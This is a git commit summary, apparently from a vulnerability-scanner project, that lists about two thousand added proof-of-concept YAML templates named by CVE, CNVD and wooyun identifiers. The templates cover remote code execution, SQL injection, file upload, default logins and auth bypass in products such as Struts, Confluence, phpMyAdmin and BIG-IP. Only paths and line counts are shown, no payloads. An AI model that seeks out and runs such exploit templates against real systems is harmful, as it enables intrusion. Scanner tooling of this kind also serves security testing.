.../mongoshake/alibaba-mongoshake-unauth.yaml | 33 + config/51pwn/yaml/nacos/CVE-2021-29442.yaml | 36 + .../nacos/unauthenticated-nacos-access.yaml | 37 + .../ApacheNifi-Api-UnauthorizedAccess.yaml | 33 + .../yaml/nostromo nhttpd/CVE-2019-16278.yaml | 29 + config/51pwn/yaml/ntopng/CVE-2021-28073.yaml | 35 + config/51pwn/yaml/nweb2fax/CVE-2008-6668.yaml | 30 + config/51pwn/yaml/ofbiz/CVE-2018-8033.yaml | 35 + config/51pwn/yaml/ofbiz/CVE-2020-1943.yaml | 36 + config/51pwn/yaml/ofbiz/CVE-2020-9496.yaml | 41 + config/51pwn/yaml/ofbiz/CVE-2021-26295.yaml | 45 + .../51pwn/yaml/ofbiz/ofbiz-default-login.yaml | 35 + .../yaml/opendreambox/CVE-2017-14135.yaml | 42 + .../poc-yaml-otter-default-password.yaml | 32 + .../51pwn/yaml/phpCollab/CVE-2017-6090.yaml | 52 + .../51pwn/yaml/phpMyAdmin/CVE-2009-1151.yaml | 38 + .../51pwn/yaml/phpMyAdmin/CVE-2018-12613.yaml | 35 + .../51pwn/yaml/phpMyAdmin/CVE-2019-12616.yaml | 38 + .../51pwn/yaml/phpMyAdmin/CVE-2022-23808.yaml | 40 + .../phpmyadmin-misconfiguration.yaml | 36 + .../yaml/phpMyAdmin/phpmyadmin-setup.yaml | 44 + .../yaml/phpMyAdmin/pma-server-import.yaml | 44 + .../yaml/phpMyChat-Plus/CVE-2019-19908.yaml | 31 + .../51pwn/yaml/phpPgAdmin/CVE-2007-5728.yaml | 32 + .../51pwn/yaml/phpPgAdmin/CVE-2008-5587.yaml | 34 + .../51pwn/yaml/phpShowtime/CVE-2012-0981.yaml | 32 + .../yaml/phpfastcache/CVE-2021-37704.yaml | 37 + .../yaml/phpstudy/phpstudy-backdoor-rce.yaml | 33 + config/51pwn/yaml/rConfig/CVE-2019-16662.yaml | 44 + config/51pwn/yaml/rConfig/CVE-2020-10546.yaml | 44 + config/51pwn/yaml/rConfig/CVE-2020-10547.yaml | 44 + config/51pwn/yaml/rConfig/CVE-2020-10548.yaml | 42 + config/51pwn/yaml/rConfig/CVE-2020-10549.yaml | 45 + config/51pwn/yaml/rConfig/CVE-2020-13638.yaml | 68 + config/51pwn/yaml/rConfig/CVE-2020-9425.yaml | 44 + .../51pwn/yaml/satellian/CVE-2020-7980.yaml | 39 + .../yaml/seacms/seacms-before-v992-rce.yaml | 26 + config/51pwn/yaml/seacms/seacms-rce.yaml | 34 + config/51pwn/yaml/seacms/seacms-sqli.yaml | 30 + config/51pwn/yaml/seacms/seacms-v654-rce.yaml | 32 + .../yaml/seacms/seacmsv645-command-exec.yaml | 30 + config/51pwn/yaml/shadow/CVE-2020-20982.yaml | 34 + config/51pwn/yaml/shenyu/CVE-2021-37580.yaml | 34 + config/51pwn/yaml/shenyu/CVE-2022-23944.yaml | 39 + config/51pwn/yaml/shopxo/CNVD-2021-15822.yaml | 32 + .../51pwn/yaml/spark/spark-webui-unauth.yaml | 36 + config/51pwn/yaml/spark/unauth-spark-api.yaml | 36 + .../CVE-2016-4977.yaml" | 25 + .../CVE-2022-22965.yaml" | 43 + .../51pwn/yaml/storm/apache-storm-unauth.yaml | 35 + config/51pwn/yaml/twitter/CVE-2020-35774.yaml | 51 + config/51pwn/yaml/uWSGI/CVE-2018-7490.yaml | 42 + .../51pwn/yaml/vBulletin/CVE-2018-6200.yaml | 33 + .../51pwn/yaml/vBulletin/CVE-2019-16759.yaml | 38 + .../51pwn/yaml/vBulletin/CVE-2020-12720.yaml | 40 + .../51pwn/yaml/vBulletin/CVE-2020-17496.yaml | 40 + .../yaml/webEdition CMS/CVE-2014-5258.yaml | 40 + config/51pwn/yaml/webmin/CVE-2019-15107.yaml | 36 + config/51pwn/yaml/webmin/webmin-panel.yaml | 27 + config/51pwn/yaml/websvn/CVE-2021-32305.yaml | 52 + config/51pwn/yaml/weiphp/CNVD-2020-68596.yaml | 45 + config/51pwn/yaml/weiphp/Weiphp-SQLi.yaml | 32 + .../yaml/xunchi CMS/CNVD-2020-23735.yaml | 43 + config/51pwn/yaml/yccms/yccms-rce.yaml | 27 + .../51pwn/yaml/zzcms/zzcms-zsmanage-sqli.yaml | 47 + .../ssvid-89511.yaml" | 35 + .../wanhuOA-default-login.yaml" | 42 + .../wanhuOA-sqli-DossierBorrowAction.yaml" | 38 + ...anhuOA-sqli-GovDocumentDossierAction.yaml" | 38 + .../wanhuOA-sqli-GovSendFileAction.yaml" | 38 + .../wanhuOA-sqli-NameCardAction.yaml" | 38 + .../wanhuOA-sqli-WorkflowCommonAction.yaml" | 41 + .../wanhuOA-sqli-desktop.yaml" | 45 + .../wanhuOA-sqli-outMailLoginCheck.yaml" | 38 + .../wanhuOA-sqli-savePersonInfo.yaml" | 45 + .../wooyun-2014-063903.yaml" | 72 + .../wooyun-2014-063903_2.yaml" | 72 + .../wooyun-2014-064324.yaml" | 39 + .../wooyun-2014-067391.yaml" | 65 + .../wooyun-2014-075657.yaml" | 38 + .../wooyun-2014-082128.yaml" | 65 + .../wooyun-2015-0108823.yaml" | 72 + .../wooyun-2015-0116362.yaml" | 39 + .../SponIpIntercom-File-Read.yaml" | 62 + .../spon-ip-intercom-ping-rce.yaml" | 42 + .../telecom-gateway-default-login.yaml" | 39 + .../CNVD-2021-26422.yaml" | 32 + .../Chinaunicom-Default-Login.yaml" | 36 + .../huawei-HG532e-default-login.yaml" | 39 + .../huawei-hg255s-lfi.yaml" | 28 + .../huawei-hg659-lfi.yaml" | 27 + .../CNVD-2021-04128.yaml" | 42 + .../NGFW4000-DeafultPass.yaml" | 31 + .../WEB-Gateway-FileDownlaod.yaml" | 30 + .../WEB-Gateway-InfoLeak.yaml" | 29 + .../WEB-audit_db-Downlaod.yaml" | 29 + .../WEB-monitor_db-Downlaod.yaml" | 29 + .../WEB-policy_db-Downlaod.yaml" | 29 + .../WEB-product_db-Downlaod.yaml" | 29 + .../WebGateway-ifcfg_db-Downlaod.yaml" | 29 + .../TopApp-AD-LoginBypass.yaml" | 31 + ...pApp-AD_bytecache_run_action_php-RCE.yaml" | 33 + .../TopApp-AD_change_lan_php-FileRead.yaml" | 30 + .../TopApp-AD_change_lan_php-RCE.yaml" | 35 + .../TopApp-AD_download_php-FileDownload.yaml" | 30 + .../TopApp-AD_enable_tool_debug_php-RCE.yaml" | 31 + .../TopApp-AD_getMacAddr_php-RCE.yaml" | 31 + ...opApp-AD_static_arp_include_php-SQLi.yaml" | 36 + ...curityCheckerSys-Unauth-DownloadLogs.yaml" | 28 + .../Front-NoCondition-RCE.yaml" | 46 + .../LBS-LFR.yaml" | 31 + .../LBS-SQLi.yaml" | 34 + .../hanming-lfr.yaml" | 44 + .../BT742-PMA-UnauthorizedAccess.yaml" | 31 + .../CNVD-2021-15824.yaml" | 29 + .../ruijie-info-pwdsetting.yaml" | 38 + .../demo.yaml" | 38 + .../E_cology-sqli-Page.yaml" | 47 + .../E_cology-sqli-login.yaml" | 47 + .../Ecology-rce-WorkflowServiceXml.yaml" | 46 + .../Ecology-sqli-BlogService.yaml" | 79 + .../Ecology-sqli-HrmCareerApplyPerEdit.yaml" | 38 + .../Ecology-sqli-HrmCareerApplyPerView.yaml" | 38 + .../Ecology-sqli-HrmCareerApplyWorkEdit.yaml" | 38 + .../Ecology-sqli-HrmCareerApplyWorkView.yaml" | 38 + .../Ecology-sqli-MobileService.yaml" | 80 + .../Ecology-sqli-SignatureDownLoad.yaml" | 38 + .../Ecology-users_data-Unauthorized.yaml" | 37 + .../Fangwei-OA-AdminLogin.yaml" | 23 + .../ecology-arbitrary-fileUpload.yaml" | 39 + ...logy-fileDownload-directoryTraversal.yaml" | 25 + .../ecology-javabeanshell-rce.yaml" | 35 + ...y-springframework-directoryTraversal.yaml" | 25 + .../ecology-syncuserinfo-sqli.yaml" | 26 + .../ecology-v8-sqli.yaml" | 27 + .../ecology-v9-fileUpload.yaml" | 39 + .../ecology-weaver_common-fileUpload.yaml" | 39 + .../ecology-workflowcentertreedata-sqli.yaml" | 31 + .../wooyun-2014-076418.yaml" | 61 + .../wooyun-2014-076547.yaml" | 56 + .../wooyun-2015-0125638_2.yaml" | 41 + .../wooyun-2015-0126024_1.yaml" | 41 + .../wooyun-2015-0130759.yaml" | 38 + .../wooyun-2015-0136818.yaml" | 114 + .../wooyun-2015-0136933.yaml" | 52 + .../E_bridge-lfi-saveYZJFile.yaml" | 44 + .../CNVD-2020-46552.yaml" | 25 + .../sangfor-edr-auth-bypass.yaml" | 43 + .../sangfor-edr-rce.yaml" | 37 + .../sangfor-ba-rce.yaml" | 33 + .../CNVD-2019-13870.yaml" | 78 + .../CNVD-2019-13871.yaml" | 66 + .../CNVD-2019-14600.yaml" | 67 + .../CNVD-2019-16769.yaml" | 39 + .../CNVD-2019-17061.yaml" | 29 + .../aikcms-admin-page-getshell.yaml" | 67 + .../aikcms_2link_edit_sqli.yaml" | 69 + .../aikcms_v2-add-upload.yaml" | 70 + .../aikcms_v2-admin-File-Upload.yaml" | 94 + .../aikcms_v2-admin-upload.yaml" | 102 + .../aikcms_v2-caiji-upload.yaml" | 71 + .../aikcms_v2-edit-sqli.yaml" | 26 + .../aikcms_v2-nav-upload.yaml" | 58 + .../aikcms_v2-poster-editphp-time-blind.yaml" | 51 + .../aikcms_v2-xss.yaml" | 27 + .../aikcms_v2_notice_edit_sqli.yaml" | 52 + ...ziyu-ApigoodsController-sqlinjection.yaml" | 33 + .../shiziyu-apicontroller-sqlinjection.yaml" | 33 + .../shiziyu-image_upload-fileupload.yaml" | 59 + .../shiziyu-wxapp-fileupload.yaml" | 60 + .../TruboCRM-sqli-forgetpswd.yaml" | 40 + .../wooyun-2010-0136925.yaml" | 67 + .../wooyun-2010-0162149.yaml" | 40 + .../wooyun-2010-076114.yaml" | 41 + .../wooyun-2010-083458.yaml" | 61 + .../wooyun-2015-0137238.yaml" | 67 + .../wooyun-2015-0137503.yaml" | 67 + .../wooyun-2015-0137503_2.yaml" | 37 + .../wooyun-2015-0162117.yaml" | 40 + .../wooyun-2015-013006.yaml" | 43 + .../wooyun-2015-0157215.yaml" | 41 + .../wooyun-2015-156891_1.yaml" | 41 + .../wooyun-2015-156891_2.yaml" | 41 + .../yonyou_U8-upload-FileUpload.yaml" | 52 + .../wooyun-2010-0108912.yaml" | 47 + .../wooyun-2010-057130.yaml" | 33 + .../yonyou_ICC-download-getfile.yaml" | 37 + ...onyou_NC_IUFO-sqli-publishinfodetail.yaml" | 39 + .../CNVD-2021-30167.yaml" | 48 + .../Yonyou-GRP_U8-SqliToRce.yaml" | 30 + .../YonyouNc-Arbitrary-FileUpload.yaml" | 42 + .../YonyouNc-Directory-Traversal.yaml" | 35 + .../YonyouU8-OA-Sqli.yaml" | 26 + .../wooyun-2010-0112834.yaml" | 39 + .../wooyun-2014-060988.yaml" | 46 + .../wooyun-2015-0124173.yaml" | 40 + .../yonyou_NC-info-ActionServlet.yaml" | 37 + .../yonyou_NC-sqli-attach_download_d.yaml" | 56 + .../yonyou_sqli_LoginUI.yaml" | 48 + .../wooyun-2014-066512.yaml" | 38 + .../wooyun-2014-078679.yaml" | 35 + .../wooyun-2015-096676.yaml" | 33 + .../yonyou_EHR-xxe-smartweb2.yaml" | 40 + .../Changdao-165-SQLi.yaml" | 26 + .../CVE-2018-18608.yaml" | 37 + .../CVE-2018-6910.yaml" | 33 + .../CVE-2018-7700.yaml" | 33 + .../dedecms-carbuyaction-fileinclude.yaml" | 37 + .../dedecms-config-xss.yaml" | 35 + .../dedecms-guestbook-sqli.yaml" | 49 + .../dedecms-membergroup-sqli.yaml" | 36 + .../dedecms-openredirect.yaml" | 33 + .../lvmeng-uts-disclosure.yaml" | 44 + .../Netentsec-Ngfw-Rce.yaml" | 48 + .../CNVD-2016-08603.yaml" | 36 + ...sionIntercom-Service-DefaultPassword.yaml" | 40 + .../CNVD-2019-19299.yaml" | 60 + .../CNVD-2020-62422.yaml" | 33 + .../wooyun-2010-0105709.yaml" | 40 + .../wooyun-2010-0110312.yaml" | 41 + .../wooyun-2015-0100472.yaml" | 37 + .../wooyun-2015-0105502.yaml" | 37 + .../wooyun-2015-0105709.yaml" | 40 + .../wooyun-2015-0106478.yaml" | 38 + .../wooyun-2015-0107543.yaml" | 39 + .../wooyun-2015-0108235.yaml" | 38 + .../wooyun-2015-0110538.yaml" | 40 + .../wooyun-2015-0157458.yaml" | 51 + .../wooyun-2016-0170297.yaml" | 36 + .../zhiyuan-file-upload.yaml" | 34 + .../zhiyuan-oa-unauthorized.yaml" | 36 + .../CNVD-2021-28277.yaml" | 49 + .../Tongda-OA-FileInclude.yaml" | 41 + .../tongda-meeting-unauthorizedAccess.yaml" | 36 + .../tongda-session-disclosure.yaml" | 32 + .../kingsoft-v8-default-login.yaml" | 49 + .../kingsoft-v8-file-read.yaml" | 41 + .../kingdee-eas-DirectoryTraversal.yaml" | 40 + .../druid-console-exposure.yaml" | 23 + .../74cms-SQLi-1.yaml" | 41 + .../74cms-SQLi-2.yaml" | 36 + .../74cms-front-desk-getshell.yaml" | 39 + .../CVE-2020-22210.yaml" | 35 + .../Qibocms-SQLi.yaml" | 32 + .../CNVD-2019-27717.yaml" | 37 + geCurIp_test.go | 18 + lib/util/geCurIp.go | 38 + pkg/xcmd/allCmdTools.go | 3 + pkg/xcmd/mdrst.go | 6 +- tools/doNulcie4 | 6 +- 2141 files changed, 85318 insertions(+), 1342 deletions(-) delete mode 100644 ZXRjZAo=.txt delete mode 100644 ZXRjZCBwb3J0OjIzNzkK.txt create mode 100644 config/51pwn/CVE-2022-2414.yaml create mode 100644 config/51pwn/CVE-2022-25765.yaml create mode 100755 config/51pwn/yaml/ H5S CONSOLE/CNVD-2020-67113.yaml create mode 100755 config/51pwn/yaml/ Inspur ClusterEngine/CVE-2020-21224.yaml create mode 100755 config/51pwn/yaml/ Inspur ClusterEngine/inspur-clusterengine-default-login.yaml create mode 100755 config/51pwn/yaml/ NETGEAR DGN2200v1/netgear-router-auth-bypass.yaml create mode 100755 config/51pwn/yaml/ ZOHO ManageEngine Netflow Analyzer/CVE-2018-12998.yaml create mode 100755 config/51pwn/yaml/ faust_iserver/CVE-2021-34805.yaml create mode 100755 config/51pwn/yaml/11in1 CMS/CVE-2012-0996.yaml create mode 100755 config/51pwn/yaml/74cms/74cms-Getshell.yaml create mode 100755 config/51pwn/yaml/74cms/74cms-show-sqli.yaml create mode 100755 config/51pwn/yaml/74cms/74cms-v3-Boolean-injection.yaml create mode 100755 config/51pwn/yaml/74cms/74cms-xss.yaml create mode 100755 config/51pwn/yaml/74cms/74cms_V3-plusa-sqli.yaml create mode 100755 config/51pwn/yaml/74cms/74cms_file_read.yaml create mode 100755 config/51pwn/yaml/74cms/74cms_v4-register-sqli.yaml create mode 100755 config/51pwn/yaml/74cms/wooyun-2010-075009.yaml create mode 100755 config/51pwn/yaml/74cms/wooyun-2014-063225.yaml create mode 100755 config/51pwn/yaml/74cms/wooyun-2014-069833.yaml create mode 100755 config/51pwn/yaml/74cms/wooyun-2015-0137785.yaml create mode 100755 config/51pwn/yaml/ACME mini_httpd/CVE-2018-18778.yaml create mode 100755 config/51pwn/yaml/ADB/CVE-2015-0554.yaml create mode 100755 config/51pwn/yaml/APISIX/CVE-2020-13945.yaml create mode 100755 config/51pwn/yaml/APISIX/CVE-2021-45232.yaml create mode 100755 config/51pwn/yaml/APISIX/CVE-2022-24112.yaml create mode 100755 config/51pwn/yaml/APISIX/apisix-default-login.yaml create mode 100755 "config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2010-0113020.yaml" create mode 100755 "config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2010-074765.yaml" create mode 100755 "config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2010-088177.yaml" create mode 100755 "config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2015-0103389.yaml" create mode 100755 config/51pwn/yaml/APPCMS/AppCMS-File-download-vulnerability.yaml create mode 100755 config/51pwn/yaml/APPCMS/appcms-databases.yaml create mode 100755 config/51pwn/yaml/APPCMS/wooyun-2010-045643.yaml create mode 100755 config/51pwn/yaml/APPCMS/wooyun-2015-0139684.yaml create mode 100755 config/51pwn/yaml/ASUS GT-AC2900/CVE-2021-32030.yaml create mode 100755 config/51pwn/yaml/AVCON6/avcon6-download-lfd.yaml create mode 100755 config/51pwn/yaml/AVCON6/avcon6-infomation-leak.yaml create mode 100755 config/51pwn/yaml/AVCON6/avcon6-infomation-rce.yaml create mode 100755 config/51pwn/yaml/AVTECH/AVTECH-Machine-info.yaml create mode 100755 config/51pwn/yaml/AVTECH/AVTECH-cgibox-lfd.yaml create mode 100755 config/51pwn/yaml/AVTECH/ssvid-92494.yaml create mode 100755 config/51pwn/yaml/Accela Civic Platform/CVE-2021-33904.yaml create mode 100755 config/51pwn/yaml/Accela Civic Platform/CVE-2021-34370.yaml create mode 100755 config/51pwn/yaml/Acrolinx Server/CVE-2018-7719.yaml create mode 100755 config/51pwn/yaml/ActiveMQ/CVE-2018-8006.yaml create mode 100755 config/51pwn/yaml/ActiveMQ/activemq-default-login.yaml create mode 100755 config/51pwn/yaml/ActiveMQ/poc-yaml-CVE-2016-3088.yaml create mode 100755 config/51pwn/yaml/Adminer/CVE-2021-21311.yaml create mode 100755 config/51pwn/yaml/Adminer/CVE-2021-29625.yaml create mode 100755 "config/51pwn/yaml/Adobe Experience Manager\357\274\210AEM\357\274\211/CVE-2016-0957.yaml" create mode 100755 config/51pwn/yaml/Advanced Comment System/CVE-2020-35598.yaml create mode 100755 config/51pwn/yaml/Advanced Real Estate Script/Advanced-city-sqli.yaml create mode 100755 config/51pwn/yaml/Advanced Real Estate Script/Advanced-locat-sqli.yaml create mode 100755 config/51pwn/yaml/Advanced Real Estate Script/Advanced_v4-state-sqli.yaml create mode 100755 config/51pwn/yaml/Advantech R-SeeNet/CVE-2021-21801.yaml create mode 100755 config/51pwn/yaml/Advantech R-SeeNet/CVE-2021-21802.yaml create mode 100755 config/51pwn/yaml/Advantech R-SeeNet/CVE-2021-21803.yaml create mode 100755 config/51pwn/yaml/Airflow/Airflow-Unauth.yaml create mode 100755 config/51pwn/yaml/Airflow/CVE-2020-11978.yaml create mode 100755 config/51pwn/yaml/Airflow/CVE-2020-13927.yaml create mode 100755 config/51pwn/yaml/Airflow/CVE-2021-38540.yaml create mode 100755 config/51pwn/yaml/Airflow/CVE-2022-24288.yaml create mode 100755 config/51pwn/yaml/Airflow/airflow-configuration-exposure.yaml create mode 100755 config/51pwn/yaml/Airflow/airflow-debug.yaml create mode 100755 config/51pwn/yaml/Airflow/airflow-default-login.yaml create mode 100755 config/51pwn/yaml/Akkadian Provisioning Manager/CVE-2020-27361.yaml create mode 100755 config/51pwn/yaml/Akkadian Provisioning Manager/CVE-2021-31581.yaml create mode 100755 config/51pwn/yaml/Alerta/CVE-2020-26214.yaml create mode 100755 config/51pwn/yaml/Alfresco Software Alfresco Community Edition/CVE-2019-14223.yaml create mode 100755 config/51pwn/yaml/Allied Telesis AT-GS950/8/CVE-2019-18922.yaml create mode 100755 config/51pwn/yaml/Amazon Acexy Wireless-N WiFi Repeater REV/CVE-2021-28937.yaml create mode 100755 config/51pwn/yaml/Ambari/ambari-default-login.yaml create mode 100755 config/51pwn/yaml/AnchorCMS/CVE-2018-7251.yaml create mode 100755 config/51pwn/yaml/Apache ActiveMQ/cve-2015-1830.yaml create mode 100755 config/51pwn/yaml/Apache ActiveMQ/cve-2016-3088.yaml create mode 100755 config/51pwn/yaml/Apache Struts/CVE-2013-2248.yaml create mode 100755 config/51pwn/yaml/Apache Struts/CVE-2019-0230.yaml create mode 100755 config/51pwn/yaml/Apache Struts/S2-001.yaml create mode 100755 config/51pwn/yaml/Apache Struts/S2-003.yaml create mode 100755 config/51pwn/yaml/Apache Struts/S2-008.yaml create mode 100755 config/51pwn/yaml/Apache Struts/S2-012.yaml create mode 100755 config/51pwn/yaml/Apache Struts/S2-016.yaml create mode 100755 config/51pwn/yaml/Apache Struts/S2-032.yaml create mode 100755 config/51pwn/yaml/Apache Struts/S2-052.yaml create mode 100755 config/51pwn/yaml/Apache Struts/S2-053.yaml create mode 100755 config/51pwn/yaml/Apache Struts/S2-057.yaml create mode 100755 config/51pwn/yaml/Apache Struts/S2-062.yaml create mode 100755 "config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/CVE-2021-25646.yaml" create mode 100755 "config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/CVE-2021-36749.yaml" create mode 100755 "config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/druid-default-login.yaml" create mode 100755 "config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/druid-monitor.yaml" create mode 100755 "config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2016-4975.yaml" create mode 100755 "config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2017-15715.yaml" create mode 100755 "config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2019-10092.yaml" create mode 100755 "config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2020-9490.yaml" create mode 100755 "config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2021-40438.yaml" create mode 100755 "config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2021-41773.yaml" create mode 100755 "config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2021-42013.yaml" create mode 100755 "config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/apache-filename-enum.yaml" create mode 100755 config/51pwn/yaml/Apexis/Apexis-IP-CAM-Password-Read.yaml create mode 100755 config/51pwn/yaml/Apexis/Apexis-IPCAM-directory-traversal.yaml create mode 100755 config/51pwn/yaml/Apexis/Apexis-IPCAM-info.yaml create mode 100755 config/51pwn/yaml/AppServ/CVE-2008-2398.yaml create mode 100755 config/51pwn/yaml/Application Performance Management/CVE-2020-11854.yaml create mode 100755 config/51pwn/yaml/Appweb/CVE-2018-8715.yaml create mode 100755 config/51pwn/yaml/Aptana Jaxer/CVE-2019-14312.yaml create mode 100755 config/51pwn/yaml/Argus Surveillance DVR/CVE-2018-15745.yaml create mode 100755 config/51pwn/yaml/Artica Pandora FMS/CVE-2020-8497.yaml create mode 100755 config/51pwn/yaml/ArticaTech Artica Proxy/CVE-2020-13158.yaml create mode 100755 config/51pwn/yaml/ArticaTech Artica Proxy/CVE-2020-17505.yaml create mode 100755 config/51pwn/yaml/ArticaTech Artica Proxy/CVE-2020-17506.yaml create mode 100755 config/51pwn/yaml/Artifactory/CVE-2019-17444.yaml create mode 100755 config/51pwn/yaml/Artifactory/CVE-2019-9733.yaml create mode 100755 config/51pwn/yaml/Aruba AirWave/CVE-2016-8527.yaml create mode 100755 config/51pwn/yaml/Atlassian Confluence/CVE-2015-8399.yaml create mode 100755 config/51pwn/yaml/Atlassian Confluence/CVE-2018-20824.yaml create mode 100755 config/51pwn/yaml/Atlassian Confluence/CVE-2019-3396.yaml create mode 100755 config/51pwn/yaml/Atlassian Confluence/CVE-2021-26084.yaml create mode 100755 config/51pwn/yaml/Atlassian Confluence/cve-2021-26085.yaml create mode 100755 config/51pwn/yaml/Atlassian Confluence/poc-yaml-Confluence-ognl-rce.yaml create mode 100755 config/51pwn/yaml/Atlassian Confluence/wooyun-2016-0208641.yaml create mode 100755 config/51pwn/yaml/Atlassian Crowda/CVE-2019-11580.yaml create mode 100755 config/51pwn/yaml/AudioCodes 400HD/CVE-2018-10093.yaml create mode 100755 config/51pwn/yaml/Automated Logic WebCTRL/CVE-2021-31682.yaml create mode 100755 config/51pwn/yaml/AvantFAX/CVE-2017-18024.yaml create mode 100755 config/51pwn/yaml/AwStats/CVE-2009-5020.yaml create mode 100755 config/51pwn/yaml/AwStats/CVE-2012-4547.yaml create mode 100755 config/51pwn/yaml/Axigen Mail Server/CVE-2012-4940.yaml create mode 100755 config/51pwn/yaml/Axis2/CVE-2010-0219.yaml create mode 100755 config/51pwn/yaml/Axublog/axublog-adlogin-sql-injection.yaml create mode 100755 config/51pwn/yaml/Axublog/axublog-goindes-xss.yaml create mode 100755 config/51pwn/yaml/Axublog/axublog-hit-sqli.yaml create mode 100755 config/51pwn/yaml/Axublog/axublog-login-universal-password.yaml create mode 100755 config/51pwn/yaml/Axublog/axublog-v1-cookiebypass.yaml create mode 100755 config/51pwn/yaml/Axublog/axublog_v1-ad-admin-sqli.yaml create mode 100755 config/51pwn/yaml/Axublog/axublog_v1-app-lfr.yaml create mode 100755 config/51pwn/yaml/Axublog/axublog_v1-hitphp-sqli.yaml create mode 100755 config/51pwn/yaml/Axublog/axublog_v1-search-sqli.yaml create mode 100755 config/51pwn/yaml/Axublog/axublog_v1-upload.yaml create mode 100755 config/51pwn/yaml/AxxonSoft Axxon Next/CVE-2018-7467.yaml create mode 100755 config/51pwn/yaml/B2Bbuilder/B2Bbuilder-sms-sqli.yaml create mode 100755 config/51pwn/yaml/B2Bbuilder/B2Bbuilder-sqli.yaml create mode 100755 config/51pwn/yaml/B2Bbuilder/B2Bbuilder_v7-getshell.yaml create mode 100755 config/51pwn/yaml/BEESCMS/beescms-header-sqli.yaml create mode 100755 config/51pwn/yaml/BEESCMS/beescms-memberpost-sqli.yaml create mode 100755 config/51pwn/yaml/BEESCMS/beescms-mxform-sqli.yaml create mode 100755 config/51pwn/yaml/BEESCMS/beescms-order-save-sqli.yaml create mode 100755 config/51pwn/yaml/BEESCMS/beescms-save-sqli.yaml create mode 100755 config/51pwn/yaml/BEESCMS/beescms-v3-member-sqli.yaml create mode 100755 config/51pwn/yaml/BEESCMS/beescms_v3-login-sql-injection.yaml create mode 100755 config/51pwn/yaml/BEESCMS/beescms_v4-Permission-bypass.yaml create mode 100755 config/51pwn/yaml/BEESCMS/beescms_v4-login-sqli.yaml create mode 100755 config/51pwn/yaml/BIG-IP/CVE-2020-5902.yaml create mode 100755 config/51pwn/yaml/BIG-IP/CVE-2021-22986.yaml create mode 100755 config/51pwn/yaml/BIG-IP/CVE-2022-1388.yaml create mode 100755 config/51pwn/yaml/Babel/CVE-2019-1010290.yaml create mode 100755 config/51pwn/yaml/Barco/AWIND OEM Presentation Platform/CVE-2019-3929.yaml create mode 100755 "config/51pwn/yaml/Belkin\350\267\257\347\224\261\345\231\250/CVE-2014-2962.yaml" create mode 100755 config/51pwn/yaml/BeyondTrust Remote Support/CVE-2021-31589.yaml create mode 100755 config/51pwn/yaml/Binatone Global Binatone Motorola-branded Camera/CVE-2021-3577.yaml create mode 100755 config/51pwn/yaml/Biqs It Biqs-drive/CVE-2021-39433.yaml create mode 100755 config/51pwn/yaml/Bitrix24/CVE-2020-13483.yaml create mode 100755 config/51pwn/yaml/BlackArmor NAS/CVE-2014-3206.yaml create mode 100755 config/51pwn/yaml/BlackArmor NAS/CVE-2018-12296.yaml create mode 100755 config/51pwn/yaml/BlueCMS/BlueCMS-install-restinstall.yaml create mode 100755 config/51pwn/yaml/BlueCMS/BlueCMS_v1-adjs-sqli.yaml create mode 100755 config/51pwn/yaml/BlueCMS/BlueCMS_v1-guest-book-XSS.yaml create mode 100755 config/51pwn/yaml/BlueCMS/wooyun-2010-021082.yaml create mode 100755 config/51pwn/yaml/Bo-Blog/Bo-Blog-go-rce.yaml create mode 100755 config/51pwn/yaml/Bo-Blog/Bo-Blog-tag-xss.yaml create mode 100755 config/51pwn/yaml/Boa Webserver/CVE-2017-9833.yaml create mode 100755 config/51pwn/yaml/Bonita BPM/CVE-2015-3897.yaml create mode 100755 config/51pwn/yaml/Bookinge/Bookinge-city-sqli.yaml create mode 100755 config/51pwn/yaml/Bookinge/Bookinge-info-sqli.yaml create mode 100755 config/51pwn/yaml/Bookinge/wooyun-2015-0137378-1.yaml create mode 100755 config/51pwn/yaml/Bookinge/wooyun-2015-0137378.yaml create mode 100755 config/51pwn/yaml/Buffalo WSR-2533DHPL2/CVE-2021-20090.yaml create mode 100755 config/51pwn/yaml/Buffalo WSR-2533DHPL2/CVE-2021-20091.yaml create mode 100755 config/51pwn/yaml/Buffalo WSR-2533DHPL2/CVE-2021-20092.yaml create mode 100755 config/51pwn/yaml/CGit/CVE-2018-14912.yaml create mode 100755 config/51pwn/yaml/CHIYU/CVE-2021-31249.yaml create mode 100755 config/51pwn/yaml/CHIYU/CVE-2021-31250.yaml create mode 100755 config/51pwn/yaml/CLink Office/CVE-2020-6171.yaml create mode 100755 config/51pwn/yaml/CMSEASY/CMSEASY-Flash-XSS.yaml create mode 100755 config/51pwn/yaml/CMSEASY/CmsEasy-bss-xss.yaml create mode 100755 config/51pwn/yaml/CMSEASY/Cmseasy-Http-Head-sqli.yaml create mode 100755 config/51pwn/yaml/CMSEASY/Cmseasy-celive-sqli.yaml create mode 100755 config/51pwn/yaml/CMSEASY/Cmseasy_v5-archive-sqli.yaml create mode 100755 config/51pwn/yaml/CMSEASY/cmseasy-aid-sqli.yaml create mode 100755 config/51pwn/yaml/CMSEASY/cmseasy-index-CommandExecution.yaml create mode 100755 config/51pwn/yaml/CMSEASY/wooyun-2014-069363.yaml create mode 100755 